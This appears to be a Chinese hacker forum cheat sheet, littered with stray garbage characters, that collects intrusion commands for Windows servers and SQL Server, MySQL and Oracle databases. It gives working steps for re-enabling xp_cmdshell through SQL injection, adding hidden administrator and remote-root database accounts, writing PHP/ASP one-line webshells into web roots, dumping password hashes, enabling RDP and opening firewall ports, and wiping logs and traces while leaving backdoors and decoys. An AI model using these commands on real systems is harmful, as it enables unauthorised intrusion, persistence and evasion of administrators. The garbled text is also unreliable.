$ C4 N! [% {; y5 V1 \1.net user administrator /passwordreq:no2 @4 O: C$ L6 ^
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
/ f/ l8 g- c- \' ?4 N9 }- M) w P2.比较巧妙的建克隆号的步骤. N5 ^% P) V: X" c X k
先建一个user的用户
, U# M* n$ t$ c6 {然后导出注册表。然后在计算机管理里删掉) |( U6 b: z0 H* n
在导入,在添加为管理员组/ Q+ I" k# B, w- }+ ^+ a9 J
3.查radmin密码! {( r/ }! ~. f' ]: `8 i% e3 M
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
, w$ b2 i4 D- J o4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
; J& S9 u9 i5 W( l* ^+ J建立一个"services.exe"的项
" Q( C5 Z; {6 \; _: s7 N再在其下面建立(字符串值)
m$ ?6 I8 L: o键值为mu ma的全路径9 {/ B% E) k2 B }+ f7 T; X
5.runas /user:guest cmd
# h E6 W: \9 K+ P1 }测试用户权限!
$ f7 y7 q" P! j. k$ I2 z9 W1 _2 C6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
- Y4 y1 ^# h4 y$ w7.入侵后漏洞修补、痕迹清理,后门置放:
/ W; ?- \0 I. a$ L. d) ?# Q基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门) p3 h3 Q2 U+ ]
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
. S: G7 t* ]4 o/ |" S- K7 U* H/ \/ Y: i2 ^, Q2 B
for example/ O( K& f7 W1 c
4 q( [/ O0 U x( s/ z$ {
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add') y) g6 c2 J" _+ i5 H
F; ]* C& e/ A" o+ }. G6 P1 G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
4 `* x; ?$ ]3 O3 w3 E0 X g/ L0 n6 I: S8 ~. M, F9 q8 X
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了, j8 p. v8 e6 L+ s7 h8 N
如果要启用的话就必须把他加到高级用户模式& Y9 S3 C5 P7 s k
可以直接在注入点那里直接注入" W, T5 Y" B$ s% N% z6 L: Q
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--# o: \. }/ I$ [ i
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--. l0 W7 q) \, m: R
或者( g5 D( z- H2 [1 V. ~; N, N
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
2 D/ t9 Q* b8 ~5 t来恢复cmdshell。) T& {% m- v# t+ C. C
: c" N$ T# f' b6 h! W& J% H
分析器
3 r+ e7 }0 k [! \3 Y+ h3 f' AEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--$ R8 S; K7 x3 V; U
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
) U2 p7 H' D# S" L10.xp_cmdshell新的恢复办法
0 X8 W1 f! @. T) _3 K# m/ |1 Qxp_cmdshell新的恢复办法" r4 C8 f/ s% C9 h/ b
扩展储存过程被删除以后可以有很简单的办法恢复:
% V; q4 o# S! Y删除. F5 {$ [& J. g& N" { I
drop procedure sp_addextendedproc
# P8 ]' b- l& x9 F0 Udrop procedure sp_oacreate
# f- r2 W" X' h/ d8 V R, {' Nexec sp_dropextendedproc 'xp_cmdshell'
4 W: [! S9 ~- z2 V- ~' J9 p$ E* z0 i3 }- I9 @' ]: U9 }
恢复
. I+ ]/ C" z4 W& t# F" udbcc addextendedproc ("sp_oacreate","odsole70.dll")
9 L- H" n) M5 x+ Udbcc addextendedproc ("xp_cmdshell","xplog70.dll")
+ E9 E K5 O w5 H# C9 ^; x, R2 A6 ?( ], J4 s5 W# k
这样可以直接恢复,不用去管sp_addextendedproc是不是存在3 i' B/ Z E) P& m* k3 h8 v
" ?+ Z0 P! Q+ g( _1 k
-----------------------------
# h! t) V7 Q+ |$ c3 S8 c$ S" i% v9 L
删除扩展存储过过程xp_cmdshell的语句:
3 w2 z2 \* j; h1 Z* t$ x# B8 r. pexec sp_dropextendedproc 'xp_cmdshell'
& J" A+ S ^7 I9 y- I/ z
9 X3 ^0 A' c0 B+ ^ U6 L, r恢复cmdshell的sql语句
l4 b/ i7 E; Y: L% m& T0 G0 Pexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ v1 m8 b! ]2 e+ m/ @, q8 N7 }( O- C5 w
4 `9 ?* }+ e6 E1 f0 |
开启cmdshell的sql语句! l; y* }0 S! \8 x1 h8 T
. J3 `8 t$ b' p5 i
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll') G; J/ a j& M" W9 o+ B
+ H* o/ D/ Y: f/ T
判断存储扩展是否存在/ t5 M4 a! z. d4 h' ]' ^$ [5 ]
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'8 p1 ~/ H1 k& F0 h6 q; b
返回结果为1就ok
( c9 u4 M; U2 S! k6 \- \9 Q& [% r0 o1 \8 M% E
恢复xp_cmdshell+ f/ I j6 V7 y9 a) q2 F
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
9 m: d1 m$ i) @" b# n返回结果为1就ok$ h# \; G2 l% N; A% @
8 ]5 h/ p5 ]$ ~) L, G0 E7 ~+ i否则上传xplog7.0.dll+ i4 }. ~; G# i' o& ^! n. p2 R
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'* G4 P7 ~5 b! d
' S, }( |: e+ O+ o堵上cmdshell的sql语句
6 k4 Y3 ^- {$ u7 S- csp_dropextendedproc "xp_cmdshel& t6 x- d; R" Q
-------------------------
- |9 I: H G; K: v' D清除3389的登录记录用一条系统自带的命令:
6 G, V8 j' p$ @% n! w/ `( K! kreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f R& W7 E: F- t
" f: i; a6 \$ K% X
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件+ h7 j* n+ C x( y
在 mysql里查看当前用户的权限
b& ^5 {+ J( Z) E4 kshow grants for
8 U" k- F3 w& K. I
! F9 {4 k2 M2 z以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
( V' W3 D1 m/ i4 v% K- o" r0 B. e4 E: C$ e0 K# F
! d6 M" H7 I$ i# L$ O7 A- _
Create USER 'itpro'@'%' IDENTIFIED BY '123';( g( {) F& w! @2 A/ t/ M k
# `+ g8 a. s% f: i0 c6 `GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
' P# T& q8 q' L0 H; V
' z# R0 a3 R6 r6 L7 p3 MMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 06 H' @% z" K4 y0 }1 P; c4 z; A$ Y) X' l
4 o N& x( O) j% rMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
+ C1 u) L) h2 b* P8 A4 e
& l& N/ X- R9 P" y3 b搞完事记得删除脚印哟。) {8 W7 N) b; ]4 V
: J2 u9 R% I3 U& e& _3 e" b s4 b
Drop USER 'itpro'@'%';
' p3 L! j! j# j8 t2 c# w3 L+ r) O( u& [. p5 b5 k. Y+ y
Drop DATABASE IF EXISTS `itpro` ;) z$ f2 @. [9 ~. M' j
r$ l' e4 v6 w2 a) ?1 s( b当前用户获取system权限
^& F. F' \, |& Rsc Create SuperCMD binPath= "cmd /K start" type= own type= interact3 ] D( `/ h$ |9 [1 J8 s
sc start SuperCMD6 C+ ~1 t1 a, T* f) U. a
程序代码
" q. R. j8 ~& w) P<SCRIPT LANGUAGE="VBScript">
4 ^3 |( F6 P: O; t1 m G, v& fset wsnetwork=CreateObject("WSCRIPT.NETWORK")
* E8 d" v3 z6 A1 A4 j1 G y6 oos="WinNT://"&wsnetwork.ComputerName+ _, ]# c1 h: `$ M% _3 A& T+ E
Set ob=GetObject(os)2 G7 p% T$ R+ y) ?0 g
Set oe=GetObject(os&"/Administrators,group")
2 `" [) Y1 U" E& F/ vSet od=ob.Create("user","nosec")$ V' c; t7 J5 o/ E- z: H1 f
od.SetPassword "123456abc!@#"
: j7 i$ `$ N" \( H' D' f8 m1 s+ X( tod.SetInfo
: n# w6 s# S$ c; oSet of=GetObject(os&"/nosec",user)* Z/ r8 B& ?: H" Z
oe.add os&"/nosec"$ g1 N$ n! t; x |# }
</Script>
; p" q! z( } x0 ?<script language=javascript>window.close();</script>9 `3 r/ r" Q! M5 k
! _$ R7 v& ^! ?$ E+ P9 K- X$ ^# ? d- b& J6 ~
4 M) w) K% H! p1 X
3 D+ U' G5 o e$ Q6 C/ k( `, p/ f
突破验证码限制入后台拿shell
* R' S. H; q7 q @程序代码
r' N9 [/ S6 O$ U, NREGEDIT4
+ m+ M" O( q# E* }[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 1 |3 ~3 D- j- S* T" L, X
"BlockXBM"=dword:00000000
& R. ?: ^7 h' @/ k, ]( `1 J2 D. v
: P: v/ b ?' y7 @' U保存为code.reg,导入注册表,重器IE2 S$ c1 Z- A7 _9 s
就可以了
4 e) D: f m x |! Sunion写马
: ?+ d6 f6 b# v1 {程序代码
' t6 z0 c- G+ ^- s; q( fwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*, x+ o: ?& ]3 z. B
2 m' z5 ?7 ?( t% n D+ Y2 H# f
应用在dedecms注射漏洞上,无后台写马
6 c5 U8 U- B$ R( K: ededecms后台,无文件管理器,没有outfile权限的时候
/ t: V4 k7 d: x; F在插件管理-病毒扫描里
1 k" s, e0 b. G! Z* P$ G4 K8 f8 J写一句话进include/config_hand.php里 W% p. F- g7 M7 C
程序代码4 d* e" E" x9 j N, J& H+ _
>';?><?php @eval($_POST[cmd]);?>
" o% [3 [8 c5 S4 l
: L8 I7 i' T3 g- j
6 K2 s4 k* L9 S1 M p' w8 P如上格式
& Y8 ~' O" l8 V, V& ]/ l# \8 b1 W' |( Q) i [! T
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解9 e) e/ z( v& z& o' N
程序代码
5 Y' A* a7 x; }7 G1 e) q* f' G/ z" fselect username,password from dba_users;
( a- I0 O5 U# E' R. c1 P" l
( ~* g& \. u# S* O" ~2 Z3 w$ j* m
5 `# i I' m: i7 ^4 ]mysql远程连接用户# V+ F# c' ~! H# i9 V0 K
程序代码( p& Y9 U5 a; z6 |3 S" i
4 H( E8 y% y. Q9 q# I& }4 T
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
6 ~7 n9 a% b5 IGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
$ H3 N$ K2 D2 l3 m' L4 @MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
. H& h. e! g% U2 g/ o1 p" o& ]* O' yMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;0 ]) n5 h3 b4 j) J/ v N
0 C: c9 z3 X! w( c0 _, l9 s# L/ D# U
2 J! C, V7 p% v N+ p( I% |$ b1 Z1 I- T5 p& ^! P8 i' h
1 n3 [% a8 U6 ~- }9 j# S& Wecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
8 i: _0 r) P* Q P( [: ~# t; C7 |, \$ q w' Q
1.查询终端端口
T8 ^& h1 n+ I. [) o, C! r, b9 |! v
6 v! ]* E/ _- X' [% H- W% Mxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber: m2 |: r0 ~. K/ |5 `
8 H' f' v/ U: \2 S: u* B8 @
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
- ]1 ~) Y* s; V( v! F* F3 Ttype tsp.reg1 |5 m5 X9 R9 }+ J9 T1 t: O0 e( y
6 M- g1 M5 m6 h2.开启XP&2003终端服务
7 f! u5 p; H# e v) j
9 f+ `( n. X! R$ Z: Q1 S( v
9 o& s1 u2 h6 R- D8 b7 p) YREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f% [* W7 i N9 I; V m( n: i
% {, p3 O1 k) g. I8 I9 c% P2 D; o4 u6 T. r( P! [- Q0 ]
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f, I! v9 X# E. Z, Z
- W7 \7 m" L) U9 c7 _3 I8 n
3.更改终端端口为20008(0x4E28)( q- K+ D. @ r. s! {! w( o: t
) w: n8 X1 T0 f; v5 |! F
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f, { \9 }$ e1 }$ G/ Y% g* j. [ v5 v
/ q* o# B3 w9 C% X1 ]2 Z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
6 n4 [/ G9 c. i8 n; @! u
: h- |2 Q% M# |3 n& D7 n; |4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
+ @ b R$ v; f7 u. Z
8 y: ]8 k9 J0 QREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f: n! q# K/ q* R- u, X5 ~- ?/ Q. \
0 x7 l5 I, ^( T9 X
N# S$ I, V6 i) S' N, x5.开启Win2000的终端,端口为3389(需重启)2 V% t1 B+ d$ I+ I) ?( Q' |
* D8 k& y) e: i9 Z9 w% oecho Windows Registry Editor Version 5.00 >2000.reg - d+ S& A3 n6 N
echo. >>2000.reg
f/ J; Y% _/ h* R" necho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
& y3 w5 V" K+ wecho "Enabled"="0" >>2000.reg
/ @! C- n# F" }8 n# ?5 A* L+ zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
, j1 N5 B6 ]: c& hecho "ShutdownWithoutLogon"="0" >>2000.reg
, t- K6 C& ~6 S: p- b' l( V( cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
1 M3 l1 n5 B I9 F% Mecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg ; a# Y5 G# y3 H6 J# P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ; N" \* x& ^7 i- Y+ |
echo "TSEnabled"=dword:00000001 >>2000.reg . D* O! [) y- _8 z) \7 }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ( \1 [, _7 V" V& a& ?1 P
echo "Start"=dword:00000002 >>2000.reg
$ z" U* _5 [6 U9 o7 K- B# u, Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
+ @3 C$ P, N y* T l2 u- Xecho "Start"=dword:00000002 >>2000.reg ! e3 }; T3 i5 W ^5 u6 J! n
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg " f; c" M! U1 d! f- B# r+ d
echo "Hotkey"="1" >>2000.reg & B# i9 P6 c4 h- N, W1 H; s! a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
' Q# w0 o" _ U- a3 b) ^echo "ortNumber"=dword:00000D3D >>2000.reg 1 h; _* W5 m6 t3 {2 Y7 Q; q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 6 X) d; ], Y- J1 g0 ?8 H1 d
echo "ortNumber"=dword:00000D3D >>2000.reg
E9 M, S1 L4 T1 q3 g$ k4 ]. L( A
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
2 {8 u2 T, }' u! p0 {+ x. O2 b
. w2 l7 O" } X) M0 r- p) @, N@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
d3 J6 e. S& E% o(set inf=InstallHinfSection DefaultInstall)* b S# m. z; `0 M
echo signature=$chicago$ >> restart.inf
, q6 V0 I2 R; H6 T, secho [defaultinstall] >> restart.inf2 [. C: e9 {" M. m! e. o
rundll32 setupapi,%inf% 1 %temp%\restart.inf5 d, e6 J' A- f( \" R1 A0 j
0 e: |) {. Z! ?9 ~
5 c% [2 e/ B5 m3 i0 u
7.禁用TCP/IP端口筛选 (需重启): e2 R- _# B; Z, L: S) Q
: _% |% @1 l2 X- ?. u7 c+ _
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f" ^, U; K! O% T" W
1 x1 a( W4 B% y; d8.终端超出最大连接数时可用下面的命令来连接
( _# o/ A( l: O+ j' a4 F' R. d5 h5 w, I# F3 I" B% n
mstsc /v:ip:3389 /console
+ C( L* X: n, E
: K" X9 l6 Z* D- g+ R/ [9.调整NTFS分区权限5 k$ v7 [5 y0 u3 Y
6 p9 F5 z, }/ u& w+ } P' ~5 j" Jcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)- ? I+ J" F, c W. D
9 D5 Q1 M' T; y9 \. Z# ~( b. D
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
2 ^6 S) f. T. |2 @$ ~% G$ e+ [# T5 W- a/ \) @1 s S- d
------------------------------------------------------
3 k1 u l+ H" s8 u; F* P3389.vbs
+ h& T2 a/ S3 l: VOn Error Resume Next
3 N! U$ ?6 i$ o( m* l" N3 nconst HKEY_LOCAL_MACHINE = &H80000002
1 m+ e3 H1 _4 v8 CstrComputer = "."* Y* m! g6 w6 B
Set StdOut = WScript.StdOut" ]4 E9 P; t9 T X" m& d4 u
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
9 o2 J7 r7 [' a% J: SstrComputer & "\root\default:StdRegProv")8 o( z* N' n4 Q i
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
2 J# H% d' Q5 S6 O A% Qoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath3 c5 f/ y# L" W3 ~4 c
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
9 x/ _. d7 R3 E+ W& N2 v( roreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
- q' f( p! |5 p- o# { KstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"1 K# r& ]) p4 h7 f# G
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server") ] h7 y. `& _; y
strValueName = "fDenyTSConnections"
3 m6 w' j4 {+ G% {dwValue = 01 ~) _" G. O6 @
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* p! h* f# } g0 }# v% DstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
! ?& X- n0 v6 Q. Y9 R2 t/ r- AstrValueName = "ortNumber"
; l; ^, U- Z$ c- X5 J! p0 `dwValue = 3389/ R6 [) p! C. M) t% F: }7 n
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
% C9 {( p5 E9 `" ~* P# ^( NstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"& }+ r E* g. o4 s' I. B
strValueName = "ortNumber"
- A! p( n$ u2 h: cdwValue = 3389( ?- z- h* \! j8 Y) B$ [# `
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue; O" t- f% q" B
Set R = CreateObject("WScript.Shell")
. N' |. s% @# z# {) ?: w& CR.run("Shutdown.exe -f -r -t 0") + f8 g( R' _; u% a) Q
2 }: R3 Y+ G, d% ~ {删除awgina.dll的注册表键值
# G1 o5 l9 A! B( v程序代码
: `# g: |8 L2 b, }# w. {' f
1 B$ C- _- z/ ?2 }0 o3 Breg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
3 ]3 [2 X) c3 @/ P4 c5 k: }# Y- ~9 {8 O- b. a
$ y$ B: P$ r& ]4 d1 p- D4 S; u- i* B9 V' s* z3 |3 r0 O! B
4 U# D2 j* J; ~7 x! L程序代码' D1 n: g7 T4 @3 o3 A0 P
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash) k9 H1 W, A1 P; I
% f8 g) a0 S, }9 p设置为1,关闭LM Hash2 Z' } o- |' ~0 I( m* _
1 Y3 z" |! Y H; g) W数据库安全:入侵Oracle数据库常用操作命令
' `$ Y8 o0 }$ K) O3 K! T最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
* C! c6 h7 _* K' _1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
4 A! R- g8 V& W! y2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
/ z6 c1 c6 r! Q' D3、SQL>connect / as sysdba ;(as sysoper)或
, a) B/ X/ N* O% T* Xconnect internal/oracle AS SYSDBA ;(scott/tiger)4 V u& y$ m4 r# y' ], m" i5 h
conn sys/change_on_install as sysdba;
. U: {2 S& ^, j* \& W4、SQL>startup; 启动数据库实例
* R# T7 }9 u; G/ ~* |; I5、查看当前的所有数据库: select * from v$database;
) F; p8 b9 R, Sselect name from v$database;
0 r3 T2 l# L( U6、desc v$databases; 查看数据库结构字段
- i9 z& |7 Z8 l2 q7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:, W0 E- p8 z3 I2 ?/ k! T
SQL>select * from V_$PWFILE_USERS;9 G1 E7 g" v/ ^. E
Show user;查看当前数据库连接用户: D2 b5 w2 A1 M+ X9 S" o) W
8、进入test数据库:database test;
9 j0 o4 L% r. i! F$ i9、查看所有的数据库实例:select * from v$instance; m, v; } w% o, u* m+ M) E* k
如:ora9i* b8 S* h; \3 S/ i, J( K. i
10、查看当前库的所有数据表:
4 z9 p0 c$ L, u5 aSQL> select TABLE_NAME from all_tables;, W6 N4 G, k$ x; @) l
select * from all_tables;
8 R2 g) n" a! A. F- JSQL> select table_name from all_tables where table_name like '%u%';- u# t. E; P; ~3 i2 j! ^* h5 i
TABLE_NAME
7 m/ a+ u/ U* v4 G- m; |8 D9 c------------------------------
% [8 x! \2 y, ]. Y1 r2 M_default_auditing_options_
2 U( I& l$ R' Y11、查看表结构:desc all_tables;
& h1 {# m6 z- S# J5 {. x9 A- N4 e12、显示CQI.T_BBS_XUSER的所有字段结构:
1 w& u! {& j8 D( Z2 o# b& ?# x/ }desc CQI.T_BBS_XUSER;
' N9 V+ ?0 Q; p, _13、获得CQI.T_BBS_XUSER表中的记录:
/ s# U- e* Z' \8 A, Tselect * from CQI.T_BBS_XUSER;
+ m/ ?+ U5 N2 D6 Y: j; l4 g, a2 L14、增加数据库用户:(test11/test)
( ]! }6 J6 m' b& A& A/ Ecreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
0 {( E% g% m1 b& C9 |15、用户授权:
% G( m* Y4 K! dgrant connect,resource,dba to test11;- a5 z9 o8 x% ~1 O
grant sysdba to test11;
* M& D& }6 v$ `. r5 Xcommit;
4 a$ G. }, \: h+ O0 K' v16、更改数据库用户的密码:(将sys与system的密码改为test.)
& }8 I5 c; W8 g5 u4 N9 N) b- p5 valter user sys indentified by test;
( g: M4 z- K8 p8 r ?alter user system indentified by test;. n4 e' [6 n* B6 [
" |- v0 a2 z9 M
applicationContext-util.xml3 c0 U' F1 ?9 k0 n
applicationContext.xml
6 T5 h! U5 {/ s2 |7 U) a# l9 Ustruts-config.xml
+ R/ X% H. X* _1 @web.xml2 x8 R D. R) z0 B1 R0 p4 T
server.xml6 Y4 ]$ o3 ~1 B+ c: c s' {7 E( G
tomcat-users.xml0 `" r# {/ e. D
hibernate.cfg.xml
( M$ N+ s5 f" m& T! l% \4 ?% t+ tdatabase_pool_config.xml9 E9 s0 h2 G( ^' j/ [
' a% N7 v% _* [# Y2 }
8 o! ~4 v' q# ~5 |2 M$ y# F, e
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置' t- c( ]3 x B8 l5 T
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
9 P# a4 U! @3 P5 k8 O\WEB-INF\struts-config.xml 文件目录结构( u3 S8 `$ ]' i/ ?. a: e; w1 X
, ^6 c! w; p+ G1 T ]0 ospring.properties 里边包含hibernate.cfg.xml的名称) J% q }2 R8 r6 s9 y9 F
5 _ J1 g* g# ]/ [# w6 @8 w2 b4 D
0 \6 }- K- m6 ]+ }C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml+ z" u/ D8 y- \7 P1 m, w
7 i1 W) y* f* k1 Q' P$ ^
如果都找不到 那就看看class文件吧。。
% q3 O! S" S; b+ c7 c2 H5 k% Y1 a0 n( Z! q- B4 P
测试1:
9 \& L9 I, _; C1 V+ }SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
% D \: ?5 R- k' Y; w
2 }6 ^( ^- |) [测试2:! V( P6 V# Y T$ T# U
5 t, H( h7 q: o! V
create table dirs(paths varchar(100),paths1 varchar(100), id int) a2 T! O; ~* H+ \) ?, [4 r0 [
% s1 M; Z, i) _ [2 g6 vdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
9 R+ Y% I( T6 l2 q7 a5 @ G/ i7 Z0 W' `1 @. p# P& A% o/ d% b- [/ ~) ]- P; G0 _
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
4 ]1 J1 h# V; V7 I8 Z5 ?
, A! j, j7 @* V6 e1 | z0 z. ~查看虚拟机中的共享文件:# w+ y9 w9 a% ] l5 G+ j
在虚拟机中的cmd中执行
9 c% v8 ?0 w e4 J\\.host\Shared Folders. E+ ]5 m8 g; F. _, C! Y5 J2 `; |
! j8 L5 B* M, w: B4 K
cmdshell下找终端的技巧
! W C) i. w+ V& ~. ?4 Z找终端: ( W5 H+ H _8 I) L% a
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
2 }. C; {4 {. h: k* V% s- w 而终端所对应的服务名为:TermService 9 q% ~+ z9 z" h. r* w( O* _
第二步:用netstat -ano命令,列出所有端口对应的PID值! & b/ e0 s. M& k7 T. b: h- p8 |
找到PID值所对应的端口
+ S* ?5 [! k% N
' s9 |, _/ {8 q+ }4 @查询sql server 2005中的密码hash
* G, y+ y! D7 BSELECT password_hash FROM sys.sql_logins where name='sa'4 A3 I; e( j8 _0 N! H* _( b
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a$ R' j) `. \* r5 z$ E
access中导出shell
" E+ N: ?0 y8 A' {9 d7 j2 I; E2 ~: P/ u! ?( H7 V% A7 f
中文版本操作系统中针对mysql添加用户完整代码:
( j; X' w" y( Z
# O6 i* L- T! s( s4 L1 }2 Kuse test;/ E& R- U6 n0 S! \2 d
create table a (cmd text);
